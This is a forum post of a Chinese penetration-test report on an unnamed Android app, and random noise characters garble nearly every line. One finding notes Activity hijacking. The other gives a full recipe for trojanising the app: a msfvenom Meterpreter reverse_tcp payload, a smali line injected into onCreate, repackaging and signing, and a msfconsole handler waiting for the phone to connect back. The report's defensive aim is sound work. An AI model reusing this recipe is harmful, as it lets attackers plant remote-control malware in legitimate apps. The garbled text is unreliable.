; s% b- z# \ U: m. l+ q D1 s- J0 \* Y% K$ @' i+ @; C# `' T

& }4 I E+ z2 \5 l2 t3 t$ H . w0 I. c3 w k# n4 W   ( P7 @/ m# }7 ]& B3 w & L; x4 @" Z# q* `, X( h6 g

8 M9 F6 j4 w) I7 s5 D i4 K* c+ ^7 v( B0 G' B w2 b

- N1 [3 e$ F2 c' Q4 v1 n5 B1 [* a* I- c 1-2 测试结果 % @6 c9 S2 F1 D* v, Q& q5 u , K# `5 U4 _0 I

% G1 C3 j- L0 Q, L0 v, U" h/ L, D3 R, u3 Q+ _% S( o

2 L: J6 Z8 C" R2 d& V$ b5 x 0 M" U, w6 m3 g4 Y0 r' \   + E) {3 D3 {( d" j; o9 m" ] ' c0 ], ~. r; z8 g I" n- n. ~

' \ J' G- ~: l3 C* D2 k ]6 ~1 k$ Y

0 J; ?) Y: Q; F$ N* ^" w3 G8 S9 x8 }. x6 q0 c& V9 v3 l- h 2 检测结果                    8 w9 m. y' r$ f& R: T0 [ W9 Z 2 n7 Z; Y) `8 @4 K4 Q8 q2 c

5 Q" C, {$ g% X6 G5 n * L9 v( }. S; i' u; [; W# j

$ F* c1 m8 b- \+ @, W " r I0 j* m- B! m 2.1 某某某 # n: v& k }4 M& T% L* w/ v5 t" I; j; K0 s* c0 Q: m; O- W

! D( B- R9 }: l9 D& K- a6 a ; V1 S. y' W' U2 }% l

9 r3 Q0 _. G" ] 6 C% ]$ U. O+ k& u' P1 }) h 2.1.1检测目标 6 S8 F3 b$ O/ n3 V5 E8 `4 { 3 _( ?5 Q, N( d) C9 r) J- i+ u' h

, Z' x- G' _; v7 e T7 m; O/ h4 c' n

0 Y2 A) T0 v; k2 T; W7 i ) C# V$ J& k5 ^: e$ C3 l 目标地址: 某某某某某某APP ; j3 f, ?% ^8 l v2 w5 O: h( ^9 Z1 |- s2 p) H7 D8 ?, M3 q

: {; X( q/ h9 E5 o9 N 7 V, ~: p) ~; p" w. F" h

- o: s6 O% o) {# q2 v . w* p/ F7 {' G( m3 {+ c 2.1.2检测结果 " K6 o0 j5 o: m, L* }# C 3 r( Z! O7 G! T' ?( b

5 e" {+ L" l7 v 9 m4 Y3 J6 Z$ l4 d6 a* @' d

! N1 m" @5 d# p( m+ M- U# i 0 F$ b) p! \/ P. U6 V4 T0 e9 u 2.1.2.1 5 t: o+ a/ V% ^8 b/ e/ L5 E7 _ & ~4 c& z- ~( e# d' y. x* |- n

7 h/ ?, a+ L" } 3 x" [- I7 G1 D) O. M' o

; o' q: p- G. d3 E$ k _! i) \8 V+ {& F( R, H5 E4 Z 漏洞链接地址:某某某某某某APP 7 _7 @8 f2 B& F/ z+ Z & S8 v1 m8 d0 y8 `1 {& D

1 ?5 s1 r" O2 ]) y- t9 g. t* } ) }* x4 `4 L( [6 S' c- ^

" {4 b8 a4 ?! x" X8 ~ 4 z& K; w- Z Z/ x/ A   & {$ k. t. j4 [ ( C. r4 f0 A$ r0 Z' L" l

f5 O' g# O) r: c) o+ X + \1 ?. [. M5 M( [

9 u7 N7 ~" W) m" A6 w3 {& `+ I9 C 漏洞分析及取证: ! W" l- E, q9 M) o; ^) ~ 7 c7 ?; x, a! ?$ @* a! F& _' c

: Q/ d' M. f0 v9 L4 d% I - m7 R* N( R* d# d* a8 }$ L" T! Q

0 M$ d. g' ?; f: ]/ z+ Z a6 n9 ]* u: C                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - P: C' b3 I$ ]) k- c! [0 y' U# N8 M4 O' g 6 N' N* l& V# G- f" W( R* b" j

+ q4 K4 A, E" U/ C( s( C 7 b ^/ B. d( f2 E0 K$ h- Y: c7 x0 c# T& [

3 P& ?5 A5 E1 d! a6 r8 }9 T; L- a5 C Z- e: m* R      / b/ j' C# Y) E7 B# V5 \) U4 ? 0 I. L8 N( ^8 W: O0 r% z" _ `

2 u) R; U) H* v3 M ' T T& T1 ^* \7 {& ]

, J4 l$ E1 o( ~ : p4 I, z. I4 S6 g4 e6 i; X                       2 H0 a8 s0 k% e/ c! R , Z* q6 j/ ]8 w& ]1 c: c

" Z) @5 X- y: |6 d2 |3 `3 P- J7 |1 Q- s U

. S$ j: d- R; a4 |& Z+ ^ 8 J. Y- v4 H+ |# C" P" }+ l s9 U$ ]; g5 x% h3 X& Z8 Q( M : }! v2 V0 e1 J7 f' K

" L; j8 X7 x9 q$ I$ N1 S% `( h/ W$ E4 T. U& |1 ]; q8 [

! _0 M' |, e9 d+ N% |# | * ]) G g" e, F 4 @: N2 Z [4 P( L3 B+ J3 Q& u: L2 |) K, j# Y7 `- b6 L

6 c# M- L! d! S& Y+ X) E4 v+ }6 }. T

" H5 V- P9 r' X# ~. r$ } ! P! q I0 c# \" m- ^4 J: k 1 R8 j3 Y# p" E9 j0 f5 Z e+ R& J5 T3 F( F& c7 }

1 x8 q- D# o( Y5 G7 s , c1 s7 l- q( S2 p5 P$ K

' w2 W j1 @! s1 T5 v 5 C0 i0 h9 |7 L. c8 [ 漏洞危害:高 / u$ {1 O0 I& i7 f8 ~- P , D3 g c' Y) k. T' K$ h

7 N" K% o- m$ M1 J" E 6 P& L4 e: e$ ?$ j5 m7 q
1 B) S$ T* {, m w$ e6 V6 k5 _ ?* P) y; ]: k o ) o/ o, ~4 S: P: H. O- l; f; _ I9 S' g# w' B9 |7 f. l6 N; Z' e9 N+ M% ]6 N% W! A# G& B3 Z) c( \. }" j0 {6 o- m2 m- h" ^4 k7 q: c& P# H8 U b. E5 `1 Y' s+ C! x: ^' f. G$ n; L! X- ~6 P. a/ R: r8 _7 }$ R+ f5 M( p" P4 _2 n. K# I4 ^+ x! g4 H% w: C9 F$ i5 [1 O, o) b8 O2 K$ z) J( J' B2 `: F( j% s; w Z/ m: F3 u: x& a V4 j* k M8 a* L0 b" X1 x+ P% U8 F5 U! B! N% P1 n8 Q# ?6 m# }( ^$ S- C- [& U; _2 ?9 {' [. F% A8 ~: @! L ^% t2 t4 D. R5 t# w' g O- Z( J% v7 F3 L3 g j9 N) x- y" ? T: P: e# `: J. a: ? A: @" r/ I. W! v# k: b. d* `$ D( U+ o9 i' _, b, r. L7 A! Q* k* C# b0 B0 R, ?# {$ }1 g6 t+ o5 b: ]) K
1 A! B9 r4 D5 [: i1 T; j N/ F1 h+ k8 h& b% B+ A. v: Y4 t/ H) d" v3 S

! U p$ a& C( ~- n, T, [( B" r, l! U ( i7 Q2 a/ ]! Z& h0 o$ [" ? k- ] 严重程度 7 M( K5 L+ B" F0 V ) x B, z4 X, X8 \) ~% d1 `9 P

+ I0 r6 d; }4 ?) K8 X# ~: H c 1 Y: E$ T+ l* K$ b/ o" g 		# N% ^4 ~) K1 L 0 X1 y U( V3 m9 Y& d! \

, X1 [. r8 P( i1 R m2 ?/ E' W. P/ m% t3 O & T5 o3 d! n: z+ `) a, T) A4 G( U: Y0 Y4 E" M1 Y8 r. k- P% K& G2 z4 @

/ f: b5 [. _, Y* T+ _; b4 G$ R/ c# a( x! S 		' w1 v/ \& {. L: L0 s ~5 t( Q" F0 z; X2 p( s/ S; n

1 d+ ?( {5 p* |& Q8 M ) t+ B; ~; Q4 z& }9 o 1 A# Z6 \/ e6 `) F/ W& C1 Y5 Y7 q% n! ^' ?2 Q6 e) b

, V- P4 M5 I$ W! w) V7 E , d/ H" U* C) i9 a/ M( r 		# B# W7 c4 k! b+ S: q. r $ F1 |3 a( R' L; I8 j7 k

1 F# n* Z! Q1 K( H2 a* E: L7 q- k; w4 h |- q $ q1 a1 h6 ?# `$ W - A+ {$ G- A4 j. c0 \

. @5 _, D9 r4 n' z$ r ( w g- D/ G# Q" e1 W; x9 z 		) U: I9 _# X7 j( [4 T; x& u& k- F. }1 j. H+ U

- M4 `$ i* l: V& {5 k0 O v5 o * E' |; t5 T& B) h: ] _   ( P7 ^ e5 |: X7 c- I0 O3 Z 1 }2 k4 U l. N6 v, O2 Q$ m

5 r5 [" P$ z. S ! |: P) H7 X+ X0 r( Y4 X& X" r5 l 		/ G0 l0 i; X; q' X' e' u- s \+ u, e

7 x" {9 D- N* t5 U. F9 h * \/ Z$ }- X* ^1 C ) C& f$ ?& i% `1 ^4 U1 z/ M- ~ # }0 \; L6 P7 G/ x; S

2 N8 p3 B' X1 Y" n# n2 b5 a2 |3 i, B7 a6 ?; l 		0 Z6 |. Z* u, D, b9 y4 W5 I% \& b+ X5 b k7 a

, G' W' F+ {# C! k @. K # M, `' @* l" g- ], H( g" f% P   " u, ]$ u1 }* N5 `) c0 g. |* p! c/ u& \+ c% o- }( o

! ^0 t+ s D5 g" @ 3 H* y1 s# F5 k% g
& n1 [/ U! q. u ( D+ E" R0 v" y! p; U! l
0 Z t& |' \4 \: L" k @' X - X! T+ ~( E( A- J$ V

+ i% W' d3 ]& g , j' V0 }8 |0 Y8 p0 D6 h: e$ s' r   : N8 L7 |9 T4 i' Z$ N * A; Y. w" B" L& B

- Z/ e2 u0 r2 ` D 0 j, G$ P" C7 |) q+ j4 a

# L% Y. D5 J9 z* C& P; Y- A Y5 G: N2 }/ d7 z4 d' D& b 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 7 _$ ?3 N2 J$ r ) r0 ? c# T# Q, {- @2 m

% g, P; @$ X9 j2 `; F1 V8 F) {. q' g+ y( J# w9 {

+ L7 T+ Z$ ^* }- I' f1 k$ } Q" M: R. k: b# O           " Y3 C; b# B2 G7 r$ j : a2 E! y H! x

; q0 ^$ t" _# |1 c! Q; Z7 U" F 4 k, Z* t F% p' y; `+ Y

( l2 i5 r _- O- M $ J O: h! G: q: @: O   . a4 r* E2 `* U3 j0 N0 A/ [4 {: x( U; H2 d0 T' p; F

$ n! D c( Q* c* N / u7 O/ H w4 y! f7 C

, }2 }( U( {# i - ?: u3 X7 U" O s$ f: M 2.1.2.2 # M% a5 e/ Q. }) M1 S% D5 W- ?9 L& w0 k/ e7 ?6 o1 e

) `: z. ?( ] Y# ]7 q y1 H( h . ~/ Z: [8 h' ~( R* m

* B+ T- i# s& c ; E1 F4 K) R$ Q! W2 d 漏洞链接地址:某某某某某某APP % k* T. W; a! S$ N. R+ u0 r " p6 f' X: D( @

+ y$ c. z7 b9 g6 x7 O" h1 ~! f % q7 {9 l* ?% \; D

: Y, Z5 |/ P9 v! g A 2 A8 M* D7 D# g5 F: l 漏洞分析及取证: ; z! I5 L! n' ^2 x 6 k$ C; J+ |" S

- X; _8 @4 x; C+ `; T0 l6 u* d7 Y ) o* X8 @9 y: B$ O% N* q7 r( K

/ e4 w; i y( y 0 W" b" q6 A! [+ g3 k# L: u                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & y' Z1 _& Q% a" n _ m7 r. V; @$ W: W O1 a; T7 m! J

: V' K" x6 ?* T, \8 t 9 X& x9 |2 j1 \% _& |

" v; W* G1 d% i, M % g2 m" L9 J: n Metasploit 生成木马 apk % Q& t$ g6 T3 g; S, y1 q2 }/ K8 p7 Z6 M4 B1 i$ \5 I

/ j# H& U# p( t ' P" s( ` G9 L. l' [7 @- ?

' R; {% P5 l# v$ ?# ^. E " ]$ X9 s3 {2 l6 u% Q0 F msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 ?$ c1 P: X. P* j1 c/ O 5 s' g. g/ [& I, D; T

1 @2 e m7 P3 V& z8 D' `$ T ) y @% [* c- k

% e1 A" i# \: C* u T/ j. m/ Y, L 2 J4 S: \ @) j8 H3 L 反编译目标apk和木马apk 7 e" j0 |: L- v$ i8 m, o $ y8 ~6 k& {- M" c

( M' n1 r9 t" a+ R/ A' M7 Q- E# ?9 A7 X: t

1 b% k" z) N, E: a% f* o! b' K! h% Y. J* B7 ~/ ] apktool d target.apk
" t3 Q9 b* _+ p) `$ \5 E : s1 J: L/ b, J% k! Q apktool d cockhorse.apk : X# l# M# Z3 ]: [% j0 \. p% ~4 U- a# ` " A% V' Q' Y2 O. A

: c( W2 U; n2 i, J6 d* @ 2 i+ a3 O* S, G3 C0 ]

( x" d0 q' {# F! ^; M% Y ) ]9 ^" `. x$ b+ S7 j 木马 apk 注入目标 apk 6 q" i# d8 T- H5 F# R% o ( x4 {4 {8 k+ U5 v

5 }8 @& f' H! v! P. C' ] 1 ^& n; u4 N T0 |# o

$ `, J, @# Y' V1 y" G0 x5 E0 Y+ s+ p% ?1 {1 A1 [ 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
2 V y: n% \" t. L Y) u& R ) E/ Z- Y; F1 Y+ b- b6 r invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V . n! i& d% `/ G3 u; k4 d) [7 j" d 4 N. j9 w2 U5 l" n2 _9 H

4 f1 L1 L6 z* l9 u [6 u9 g ! R* L+ }0 q8 m7 Z, x

! l3 B9 K2 h1 k * @* X* p) I+ B. Y 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 B3 N, X) ~1 o: n ! F% Q( E5 ]0 m; w3 }

* e6 L) f3 h! ]" k 7 k* a6 z, {/ j. B$ W

4 F/ M' Z) ~3 h$ \9 E: F' t! S { * d0 }7 o* [: i+ _' H 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 4 B! V0 o. ?! ?3 }- [) A7 h& q6 \. a5 \& F* S# j% f

5 Q& |$ j3 I1 c1 b _2 b5 I2 n) B9 M

. p& l0 U# X# o) M' d. O4 S / M) W# f+ I ? 回编译生成最终 apk / n5 w k5 p9 s# W! z* B! f * t) l# i) {6 s/ u

* J0 Z& q2 P8 k; h0 a% g7 m- |2 d0 [) {' X

\- i$ j$ r t* w1 ]: h/ o- { B* r : ^! u0 x- L6 Z' d2 |: G9 x* D 重新打包 " f8 ?5 i) j: v5 M % ]! t1 ]+ {5 N8 U1 W( G

+ L$ }$ F3 W$ Q! y 1 j( T: Q" R/ a+ a6 z2 _

* l$ R$ y$ i" V% G % B4 V; o# W7 Q apktool b -o repackage.apk target_app_floder + j8 l) X) m" Z( N$ j. Z" M/ j6 W( x& @$ y. O

' ~6 F- I5 ~ F0 A! b6 R2 X 6 r8 y! @ c8 M% u. P+ D

; M' C ~) q4 p2 @: E 9 M. i+ M+ X6 v, c& ?% k2 U( c 创建签名文件,有的话可忽略此步骤 ' O& n( P. s$ ~ X7 i3 f$ J- A* E* P* _" o3 a* i) @

; Y, a. O d5 P! r1 {" m8 Q7 J * b' J! f2 K. S9 e' Y

6 W( ]' \* g# {$ Z* x1 H$ o , a/ t H, B/ g1 d* k1 h keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                # E2 t% Q* j& q" Z ( b9 G5 |: X: e4 V

) f* {# C- H0 b7 |. a% r/ E, |: b0 a! `& H$ V

$ `1 R1 j9 _* q, V; n " y9 n! X, Y0 W 签名,以下任选其一 - w! K* ^2 r9 ^" W ( Q9 e* P7 N; C# u8 u$ Z% d9 X) R

/ Y) Q, Q$ |" n$ V9 Q0 R 8 j5 k2 I. P/ m) R, ]" U# T

5 B/ B& p/ g8 H9 ]- n! M 0 d$ x' w' Y5 a$ [: ~! V jarsigner 方式 ! M8 c) t! F6 p+ o& h " u0 Y0 m( g5 i# a% x2 [: W

9 L1 y% T: [ Y/ n + X) q9 o7 x5 z( e

; y, z! u4 B$ s o 1 O& y0 I, y! c, k3 H; V jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname + n) T5 ]$ v. h* R- O5 [. Z$ p$ m9 ] ( F$ A M& j2 u4 ^9 X5 B9 t" ~; @# Y

9 X6 u2 Z+ w+ k% ?8 \1 }. x% `- ^0 M# S! t3 n, }

9 G( W- z: r) O3 ~; L' i( t' Q6 l. s! ^# X7 e7 k apksigner 方式 % E6 E& \- V) a6 W9 H( k 1 R/ I0 l O* L$ h" b

$ u: H/ L6 `* E* u. e 1 N: W, D8 h# p* S9 B4 H

6 z* b3 `& e* ^6 F 3 j. W! z# a1 L* }8 e& u |2 V5 | apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 Q3 ]0 `" x( j2 H' X# c# j 6 k9 M+ ~/ a, `- k

2 X; ]2 k3 j" k- e7 A& V E8 t # J# H+ r4 h* _4 d- N, j

+ u b% d6 [" A( H * t3 U7 C2 l7 p8 W* J' C 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) n% |* G9 o- r+ F. B' L# l6 i/ ~3 q ' i; w2 \& f7 ~. N1 A7 H9 s x3 _

. C+ f1 S, T6 }& ^- L3 x; |9 o; g N: R% @) U$ S. o* k; A

+ b4 U" F0 l; R i0 S% |5 Q( p 验证,以下任选其一 - o; Z7 N6 I$ G: }0 H$ f3 Z ! ^8 K* Y- o* W% @

7 r$ ^" a7 U/ W $ H1 p) ^1 n* Y& m* w3 M

* i; O3 D2 D- l! o/ Z, b3 t- i; z! j) y jarsigner方式 ) n" [6 M7 _" B% E/ C, f 4 d& M( S ]. D& q6 l% V

* V% u; U& ^6 I. _# G3 d* y / V7 X. @5 V6 d( J, s" R8 W+ m

$ d8 j6 X {+ o- E 0 x: T- W" o% V jarsigner -verify repackaged.apk ; z$ }* A" l8 ]) |5 m& m5 K3 W. T / b- Y$ t, o) l/ j

$ d0 e+ i9 }- p+ F " T2 o' v6 D* P% j( @7 K

) a* }3 S0 T; v+ g" G$ J' m& q 0 g; S6 k" N9 Y8 T" j; [, r& { apksigner 方式 ) s8 `5 D) J4 e* O ! s1 L, `/ I( i& v; f; G c

0 m0 x% [& x) A4 l I( X- S# ?% ^# O1 p* ]+ g9 _

: [: V7 _6 e X. x0 B9 @% Q ! P3 M" H6 k$ ~ apksigner verify -v --print-certs repackaged.apk 8 {+ |. h( K# Z6 E, T) i % b o- e+ E/ X% Q' r& o

0 i2 }1 M- h* M' G+ g 3 R: H) T/ x) E

' c2 m8 t6 m" v) l1 X: M* ^( n % t6 o, k. v: ]/ t! ^) K keytool方式 3 T% l. x2 N9 q2 D& `2 [, U# l2 F1 D2 B7 R# E: f8 b' l

% Z3 ]# g6 V! t3 p- v/ [6 v ^8 Y0 c 8 Q1 D( i+ o M9 Y0 ~4 Z

: y3 F+ ~# A. I: j6 L5 |: s + c. e3 f4 @5 U% L2 W5 ^* @ keytool -printcert -jarfile repackaged.apk , k# f7 U% Z) e. Y q! y: N & b+ A/ Q$ r% ~, v

: E* K2 y% f9 o % j `- q8 M( L3 d% Q$ |5 v

: h6 Q, |4 x- f/ f" [& _0 ~- b 6 p7 j( j/ y- _, d' c. y 对齐 " f/ U( ]: k) x! N% l. G 5 v* R& P* b* A2 o! ^- w& R

* Z& F* ]. o* } ( Y8 Y( _- ~+ N6 D

* K$ w5 e, X1 v2 v5 q) U: y0 L/ e) [+ t% Z 字节对齐优化 & H% p6 F3 t9 f / ^4 X, A% i& Z

3 }! q. m1 n6 E! ]% \6 V, \, b 8 M# K/ u, R* Y8 p, l b: o

8 x9 M, p5 ?9 J7 J1 Q ( L+ c' ~0 x: R7 B zipalign -v 4 repackaged.apk final.apk / d% S( x" F0 n7 H! V ' H5 r5 ?5 o; v X, V; h

8 N7 K/ q+ K) [; w6 o( Y. g9 n: a $ J5 @7 P2 K {% Q& D9 j' W

7 m8 B- F8 x' \, s+ ^8 M+ K0 N $ u" Z5 K/ L7 p# \6 U/ M+ f 检查是否对齐 ) _/ ]9 Q2 K1 p5 W, N- b2 Q & u- ?! U$ [& ~" K: F; I# s

/ O9 I, H% C. }, U. x9 L) J5 V + w+ X# l9 H$ o* d: G9 `0 U& h

3 y9 k/ v: d& `# p$ A, B/ P + B3 j, m2 H5 T* Q zipalign -c -v 4 final.apk ! l/ |3 u" x- L, n# \ 0 r3 O) B. L- x) i1 E2 k

8 r# M* W2 P8 d. b2 t ) U# e1 `3 M/ Q6 n* Q

) q$ ^" X$ V9 o( j9 j u m& e0 v. k/ Q3 Z2 } 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 5 l# j% [6 f. B2 W" r9 F2 G# ^/ f: n! G) W& U* W9 T1 [

! ~( W1 @5 U! j+ l. K0 Y& {& ]+ x+ B3 b w t

1 e0 A3 e' }7 I: |9 d3 B3 a" W - n' s* f& @2 R+ r% Q: H: H. S' Z: c 启动Metasploit控制台,配置参数等待上线 % `8 P. H: ^! Y# K4 u1 ]; g% t : J/ h4 M7 _; R" c! v, o6 L7 Y( ?

6 o3 p) e% A/ `7 {2 q" k% r 6 P& Q& F; v. C0 T& F' d6 }* L

+ A- l) N3 x+ a& V( G% l+ M& n ; D! `' ]# c& C( a: o 在终端依次输入如下命令 5 c- {( J; a- K) E* F( I! w" l; m2 i8 e& h, [8 r9 u

4 k! h0 |5 C, g " F; y7 v/ ]0 T0 ]& y) s- i

( H+ z9 H, {& E& ~0 m9 b' ~3 |: l 8 O; I2 H9 C0 M, ^ msfconsole , n) v9 F1 h6 H: u0 L# G1 Y + b1 H3 q1 v; R$ U( y1 |9 Q; x. M+ g

1 s' P' |6 q$ m, R# s# v6 z : W& j" i7 j! |- [" q" z! v8 B

3 _" Q& J; L. ]$ V$ A 0 d& M9 T# n: X8 K use exploit/multi/handler . |) [# t1 `, u6 Q4 n: N 4 ^& k- m0 {1 j \: s7 s7 B

8 G& n& [# w1 L- E$ }- q! r) a( S' S+ }4 D# O0 k: |

3 V, v. ~ v2 y/ O: @ " s" u2 B# {; E set PAYLOAD android/meterpreter/reverse_tcp * A- d& t0 _. E6 E , e* a! I% J9 |8 y( F

1 |4 A' Q) U/ Z, B7 _/ o # }; F3 E5 d/ W; s+ J0 A' A& V

" [( d4 p# G& ]* T ) x `5 j ]! F3 N9 \ set LHOST 192.xxx.xx.xx + \; ^5 C$ u$ ]7 h3 a9 |6 w : M; \+ f# l$ u

- S. n) C9 U a2 F, A / Q6 A3 d5 ?5 k0 v- J9 r8 Z

) l) z$ F# N) j. e ) n6 e0 {- V( W/ }* r set LPORT 4444 # e/ i4 Q5 P1 Q7 M2 t ! R4 u% m0 N" p' r& F7 P9 y- q

0 z2 i2 g: [4 ^0 O3 A( r+ N8 R' }# Q0 x5 |, K$ }

- C! s; m. _% Y4 R) [ { + j) w9 k6 ` G; u; }" X+ r4 [ exploit , r2 v: v7 l! R- S6 z8 [6 D! u6 M! f& Y

: s, c4 X8 c7 ]; m, p7 Q; I# J " W3 ]+ A+ v0 i8 p: A

! c. j& y* ~8 Y3 e: t ) ? Y. K! u) Q0 i* ^ U- U, a9 m5 I% z 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               8 s( J6 t3 l/ M4 g5 T ; H3 o1 Z ^# L' z. X7 |

+ R7 ]$ _; C8 ^- K2 U" M$ G/ U+ e5 `4 P3 ?# t# N$ i! i( j$ z, G

9 P6 y$ m4 P6 O# p- \1 b$ k 6 A' M: H0 u$ U' G7 _6 V 漏洞危害:中 : T2 I& l$ {' f& g% N0 B4 N 8 ^- t0 y4 `# B- y! a: |! i

* n4 |! O+ g+ l; m6 ` 5 F# U4 D7 y: [, f$ m3 Z, d
( G( R2 Y# w* g) p3 W ; w8 L; K, e1 e( ?6 y; Z * j$ R% l ~2 G8 I4 s" w1 z7 q $ o% t$ c/ ^4 I. ` * z* t/ o C- R* Z) `5 N" A4 c/ ]% j( I$ ]9 z' [4 w$ x* J5 s8 S$ W3 x$ n9 H7 Q9 o, L# Z2 A' o8 f/ y) i9 X6 l. Z8 y( G S# v; ^$ ^0 P( `, W) e U; m+ {/ c9 a1 s6 o& k9 l- }6 l5 S' z/ R4 ? q% {* E- C, n' O- X8 ?5 s" m N; G/ Q! f8 r' _1 y5 P1 {) H5 E* j3 i: X6 J( G' J! J4 I. E0 M6 [% g* ] B1 L: s- e; Q+ u" n* D0 c' ?% @5 z3 d7 V% A6 A# R6 r5 T, F1 p- ~6 q6 x8 N8 }* C; M5 H, I. z+ W4 x$ C5 \$ p* u+ ^' I) `8 u( F! v$ C2 \6 n$ x% M0 M9 _) H3 T" l! ~, ]' ]& L& k+ e# M# V0 u$ I* n1 Z# N% r2 }" I8 U& u$ J1 Y& w8 I, m$ M1 e5 Z1 E0 i1 h1 w$ [' D0 I; `9 H2 k- z
, m* g2 k! {) D4 k& }6 s! \! K. l , `' P7 D# W* a/ r- C3 s

; M! z& j! y) i& S1 A& L7 o3 K$ A0 Q# g- a$ s2 J 严重程度 ! K8 F) a& W o; a8 Q1 E& J F/ ]/ n3 H, ~

# I, X( y( D* x( L+ f1 J1 G* G5 K1 L1 z- f! O 		! l# u' W( `4 ^5 f8 e8 J9 W {6 E* [& c/ N- y f4 x! c) j9 M: p

+ w- }/ p0 ]9 J; D1 K2 A( | ) }* Y" ?( b5 @! s 1 c! U1 U) C, C7 g4 J - q$ ?9 t; M0 g/ j6 Z/ L

. g/ O2 i: D" Q1 `- V' m $ _8 `$ S+ H8 n" h* o, `: ~: ] 		! u4 S. c- s0 S7 m h1 @+ v 1 ]5 `) y, n) M; ^( w; N2 g, z& U

: m8 v( I1 ]0 Q5 W' m' {* k. R 4 a; k: ] _) j' w- E 4 w* Q" x9 O9 [3 K4 I' I7 k1 ^( w ; j' W# t" n4 p- e( I

0 i5 ^0 n A5 @; N 8 H; l( t- P) j+ o6 a- K6 `; \1 W 		, [* M3 }! f5 R' @, x 5 o6 g, k! h# u$ s

2 A# T" f$ k- U, O& c ; R! B6 C& k3 I + J- d: z. D4 ]% M 7 W8 X4 O" G; f

8 h r: f+ ~* m; L1 m; y2 \ ! L/ c y( v$ x7 U 		. D* X8 U3 h. |; R, O: N ( d3 N# \ x: Q, _* x' }0 { % p& t4 x! \/ y: B. M) r. b. Q2 {& m) r: t2 k

/ @& e9 f3 d& v; d' Y8 g2 q: v7 B; ?& { Z- e   & x4 R7 t- e9 w/ \) P3 y8 w' w6 M+ d& S9 _3 i7 X, X; x

7 m' ?. A) p& \+ M# ~* J , o% R% ?* v& j; A# Q 		( g( [0 _6 X( `$ z! t; y4 x 5 ]7 t8 Z% P7 e+ C3 E$ [1 Y& q

# r9 m0 L9 R" U+ ]; g0 [4 h 9 M4 O6 s/ n; |2 G( J! r - V" r4 t; |+ } * X) B$ P# b/ A1 i8 j

9 D3 I$ g) [# Z+ K& g7 V' @ ) l( R: }0 T; t8 ^# l 		& }5 ~4 p# v+ @- M0 v8 {8 R 8 A# ?) j, N0 h& ^( T" o8 P$ x Z: X$ E2 g+ l# t# z t: o! U a4 D

# g8 K+ c8 [6 v+ H) T $ L; x+ t# r* a   ! C3 O8 k* R1 Z0 O # B2 @2 A$ e: N3 a' X

, X1 x: U( @3 j" J: f C5 o 8 [/ o5 D+ E1 [( u6 @3 |$ F
; b. x" @# G6 K* [ + S) c3 u+ x7 q, i4 p
% C" ?# U1 G \4 N% \. u6 b 8 K" K: v; H/ U; N, e9 C3 D

$ j1 B e* a D0 S4 a7 Z # t/ `" y" v9 E2 x( @" A   " c. N5 m/ l2 O1 _" f8 Z + T y( `/ B3 E! i% k( u

# j0 _; o7 B. s6 p* @ 9 v, A- S. f: z: B2 r

7 k- q6 l, J9 g: s ]1 R& ~- o" o+ _0 ? b+ b2 C 修复方法: : q) b7 @0 z- k X $ _6 @5 R+ ], v' b4 H% E+ E+ X

% q T/ F; z I/ H0 H; \ / R7 _' i6 a7 Z$ n" O. T/ O$ O5 f

5 {& `) G6 H) B/ f' o% P9 B5 L 4 g9 S6 _$ U1 Z) n( ~( @7 |               1. APP 启动时应做签名校验防止二次打包。
+ C" q" Y8 |( d; j# a" Z3 ]* i4 F. [* ?( e% m) J; m8 [ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 % S9 u w n. P ( {/ ~) X ]2 c6 x% [& u

7 _ u& I! A+ z2 L5 e( n4 Y2 Q9 H5 y/ T. a2 n1 z' G6 B1 ? ! t- z& [5 c% g, D+ b& f. L ) R# l, o7 F# _+ d/ v* x( w0 {% S

& G: [" [; }6 Z/ }0 w3 H / M9 W" m/ r) |   , T: m ]# {! k' c: \ 5 d) ]% S3 q) y6 ?3 K1 X

) b2 v+ s5 g; f4 c( u3 n5 s; d/ K ( F+ g3 C) K& h$ k % f s; t' ]! Q" a) @ - C+ R( L$ w$ m

1 M/ ]) c8 I# U 9 a$ M+ y( A' @: T
# B* Z9 f& V6 @. e" f/ G3 g+ H8 Z( z ' h2 O0 w+ P7 F. y! R% |

& r/ Z0 V' B& _+ k& o 7 M: E7 l8 d9 P) H
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表